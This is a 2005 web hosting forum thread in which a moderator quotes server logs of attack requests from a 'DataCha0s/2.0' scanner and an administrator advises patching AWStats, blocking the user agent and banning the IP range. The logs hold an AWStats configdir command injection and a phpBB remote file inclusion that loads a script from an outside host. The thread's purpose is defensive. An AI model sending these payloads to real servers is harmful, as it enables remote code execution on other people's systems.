Ravens PHP Scripts: Forums
 

 
  Forum Index  •  Forum FAQ  •  Search  •  Memberlist  •  Usergroups  •  Profile  •  Log in to check your private messages  •  Log in

DataChaOs/2.0 Awstats-configdir
 View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm)
Author Message
Susann
Moderator



Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support
PostPosted: Wed May 25, 2005 12:55 pm Reply with quote
Found this in my logs and I remembered me about the awstats and the phpBB discussion. But I don´t wanna talk about awstats again.
My question is:
How to ban DataChaOs and should I also ban this IP ??


Code:
69.28.236.11 - - [21/May/2005:19:10:38 +0200] "GET /awstats/awstats.pl?configdir=|echo;echo;id;%00 HTTP/1.0" 404 290 "-" "DataCha0s/2.0"





69.28.236.11 - - [21/May/2005:19:10:40 +0200] "GET /cgi-bin/awstats.pl?configdir=|echo;echo;id;%00 HTTP/1.0" 404 290 "-" "DataCha0s/2.0"


69.28.236.11 - - [21/May/2005:19:10:45 +0200] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo;id;%00 HTTP/1.0" 200 691 "-" "DataCha0s/2.0"
 
View user's profile Send private message
Raven
Site Admin/Owner



Joined: Aug 27, 2002
Posts: 17088
PostPosted: Wed May 25, 2005 1:58 pm Reply with quote
That's an old exploit in awstats. If you're up to date with awstats you're safe. DataCha0s/2.0 is the user agent. You can add it to your user agent blocker and/or ban the IP. However, he can forge the user agent and the IP. Here's info on the IP. It's probably a dynamic IP so it will change. You would want to "deny from whois 69.28.236.0/24" to ban all IP's in that range. I would also contact the ISP and give them the log details and you may get lucky and get his account canceled.
Code:
whois 69.28.236.11


[Querying whois.arin.net]


[whois.arin.net]


Peer 1 Network Inc. PEER1-BLK-07 (NET-69-28-192-0-1)


                                  69.28.192.0 - 69.28.255.255


Groupe iWeb Technologies inc. PEER1-IWEBHOST-05 (NET-69-28-236-0-1)


                                  69.28.236.0 - 69.28.236.255
 
View user's profile Send private message
Susann
PostPosted: Wed May 25, 2005 5:08 pm Reply with quote
Thank you

for the information. I use the last stable version awstats 6.4.
 
Susann
PostPosted: Fri Jul 22, 2005 7:15 pm Reply with quote
I added DataChaos into the user agent blocker. Sentinel blocked yesterday the UA.


201.14.78.219 - - [22/Jul/2005:03:50:44 +0200] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://harly.dk/vcard/.xpls/cse.gif?&cmd=id HTTP/1.0" 200 1596 "-" "DataCha0s/2.0"


Yes, I know this has been fixed in 2.0.16.



I ask me really why is this forums module still in phpnuke integrated.Maybe Bob Dylan has an answer.
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm)


 Jump to:   




View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©